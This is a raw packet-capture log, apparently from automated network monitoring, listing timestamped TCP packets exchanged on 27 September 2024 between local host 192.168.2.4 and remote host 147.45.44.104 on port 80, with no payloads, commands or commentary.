                                                                                    Sep 27, 2024 00:15:14.696434975 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.696527958 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696538925 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696551085 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696561098 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696573019 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696576118 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.696595907 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.696611881 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.696655989 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696669102 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696680069 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696702003 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.696947098 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696958065 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696969032 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.696980953 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697000980 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697026014 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697124958 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697137117 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697149038 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697160959 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697170019 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697187901 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697454929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697467089 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697478056 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697489977 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697504997 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697535992 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697609901 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697622061 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697633028 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697643995 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697644949 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697655916 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697674036 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697674990 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697686911 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697699070 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697702885 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697736025 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697741985 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.697748899 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.697772026 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.700078964 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700090885 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700100899 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700136900 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.700263023 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700274944 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700284958 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700314045 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.700413942 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700427055 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700438023 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700448990 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700474977 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.700499058 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700510979 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700545073 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.700572014 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700577974 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700613022 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.700920105 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700932980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700943947 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700957060 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.700962067 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700982094 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.700993061 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.700995922 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701009989 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701020956 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701031923 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701037884 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.701066017 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.701078892 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701091051 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701141119 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.701565981 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701576948 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701587915 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701597929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701608896 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701613903 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.701633930 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.701718092 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701730013 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701735020 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701745987 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701760054 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701767921 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.701771975 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.701795101 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.702346087 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.702358007 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.702368975 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.702380896 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.702393055 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.702423096 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.702488899 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.702539921 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.702553034 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.702559948 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.702586889 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.702950954 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.702963114 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703002930 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.703110933 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703121901 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703134060 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703145027 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703155041 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703166962 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703174114 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.703197956 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.703216076 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.703862906 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703874111 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703885078 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703896999 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703907013 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703917980 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.703941107 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.703941107 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.703955889 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.704020977 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704034090 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704044104 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704056025 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704073906 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704077005 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.704087973 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704101086 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704109907 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.704113960 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704138041 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.704150915 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.704509974 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704549074 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704561949 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704572916 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704586029 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704598904 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704607964 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.704612017 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704622984 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.704631090 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.704638958 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.704664946 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.706150055 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.782299995 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782315016 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782321930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782380104 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782392979 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782399893 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782408953 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.782411098 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782460928 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.782573938 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782586098 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782598019 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782609940 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782614946 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.782641888 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.782771111 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782785892 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782823086 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.782859087 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782871962 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782882929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782895088 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782907009 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782915115 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.782918930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782928944 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.782932997 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.782955885 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.782974958 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783127069 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783236027 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783247948 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783260107 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783271074 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783282995 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783293962 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783305883 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783324003 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783324003 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783324003 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783327103 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783353090 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783622026 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783632994 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783643961 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783658028 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783668041 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783668995 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783682108 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783683062 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783696890 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783705950 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783710003 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783749104 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783934116 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783946037 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783957958 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783970118 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783973932 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.783983946 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.783997059 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.784003019 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.784010887 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.784034014 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.784046888 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.786209106 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786370993 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786381006 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786392927 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786406994 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786417961 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786429882 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.786434889 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786438942 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.786449909 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786456108 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.786493063 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786494970 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.786525965 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786537886 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786550045 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786571026 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.786588907 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.786675930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786688089 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786700010 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786727905 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.786953926 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786967039 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786977053 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.786992073 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787015915 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787200928 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787214994 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787228107 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787240028 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787251949 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787254095 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787286043 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787425995 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787436008 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787447929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787458897 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787471056 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787475109 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787482977 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787489891 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787497044 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787504911 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787508965 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787520885 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787528038 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787533045 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787544966 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787559032 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787575006 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787596941 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787736893 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787750006 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787774086 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787786007 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787806988 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787884951 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787897110 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787908077 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787919998 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787930965 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787931919 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787945986 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787955999 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.787957907 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.787993908 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.788428068 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.788439989 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.788451910 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.788464069 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.788470984 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.788477898 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.788490057 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.788501978 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.788502932 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.788513899 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.788537025 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.788556099 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789226055 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789241076 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789252043 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789263964 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789269924 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789269924 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789283037 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789292097 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789294958 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789314985 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789343119 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789709091 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789720058 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789733887 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789751053 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789762020 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789771080 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789773941 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789787054 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.789787054 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789799929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.789812088 CEST8049774147.45.44.104192.168.2.4
